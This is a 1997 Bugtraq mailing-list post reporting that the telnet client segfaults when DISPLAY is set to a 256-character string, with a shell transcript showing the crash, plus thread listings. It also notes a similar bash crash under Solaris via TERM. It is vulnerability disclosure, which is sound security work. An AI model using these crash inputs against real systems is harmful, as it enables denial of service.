Bugtraq mailing list archives
More telnet Daemon Fun
From: aaron () ug cs dal ca (Aaron Campbell)
Date: Mon, 1 Dec 1997 22:29:21 -0400
Regarding user-supplied terminfo files... |autopsy!user52810 () AZRAEL DWEEBS NET| suggested this feature, as found in the terminfo man page, might be malaciously used in a custom terminfo file: -np Number of pages of memory c100-4p Possibile to crash a machine using this? Anyone? Thanks to Jason Parsons <root () saffroncs com> for pointing this one out: [fx@somehost fx]$ export DISPLAY="" [fx@somehost fx]$ telnet . Trying 0.0.0.0... Connected to .. Escape character is '^]'. Red Hat Linux release 4.2 (Biltmore) Kernel 2.0.30 on an i586 login: telnet> send esc telnet> quit Connection closed. [fx@somehost fx]$ export DISPLAY="1234567890123456789012345678901234567890123 45678901234567890123456789012345678901234567890123456789012345678901234567890 12345678901234567890123456789012345678901234567890123456789012345645678901234 56789012345678901234567890123456789012345678901234567890123456" [fx@somehost fx]$ telnet . Trying 0.0.0.0... Connected to .. Escape character is '^]'. Segmentation fault (core dumped) [fx@somehost fx]$ ls -l core -rw------- 1 fx nnh 315392 Dec 1 21:51 core [fx@somehost fx]$ That's 256 characters up there, BTW. Also, note we're setting the DISPLAY variable this time, not TERM. Lastly, while doing some testing, I discovered that setting my TERM variable to a 256-character string under Solaris 2.5.1 caused my bash shell session to crash, dump core and log me out. This may or may not have been mentioned on Bugtraq before, and may or may not be due to missing patches. Pardon my vagueness, but I've been swamped lately and really don't have much time to explore these problems in more detail. . _ _ _ _ . . _ _ . . _ _ _ . . : |-||-||<|_||\| |_|-||\/||-'|->|_-|_|_ Dalhousie University, Halifax, NS `--------------------------------------------- [fx!aaron () ug cs dal ca] ----
Current thread:
- an detailed explaination why land attack works?, (continued)
- an detailed explaination why land attack works? Feiyi Wang (Nov 29)
- Possible Solaris 2.6 hole at(1M) sp00n (Dec 02)
- Re: Possible Solaris 2.6 hole at(1M) Casper Dik (Dec 04)
- Re: an detailed explaination why land attack works? Bill Paul (Dec 03)
- Fw: Insufficient allocations in net/unix/garbage.c (fwd) Phillip R. Jaenke (Dec 03)
- Re: Fw: Insufficient allocations in net/unix/garbage.c (fwd) Alan Cox (Dec 04)
- an detailed explaination why land attack works? Feiyi Wang (Nov 29)
- Sun Security Bulletin #00159 (fwd) Howie (Dec 03)
- Sun Security Bulletin #00160 (fwd) Howie (Dec 03)
- Q165005: Windows NT Slows Down Due to Land Attack Aleph One (Dec 04)
- Q177539: Windows 95 Stops Responding Because of Land Attack Aleph One (Dec 04)
- More telnet Daemon Fun Aaron Campbell (Dec 01)
- Re: More telnet Daemon Fun Elliot Lee (Dec 02)
- tcsh/Solaris (Re: More telnet Daemon Fun) Peter Radcliffe (Dec 03)
- scoterm exploit Aleph One (Dec 04)
- Re: Linux inetd.. Alan Cox (Dec 02)
- Re: Linux inetd.. Darren Reed (Dec 02)
- Re: Linux inetd.. Darren Reed (Dec 02)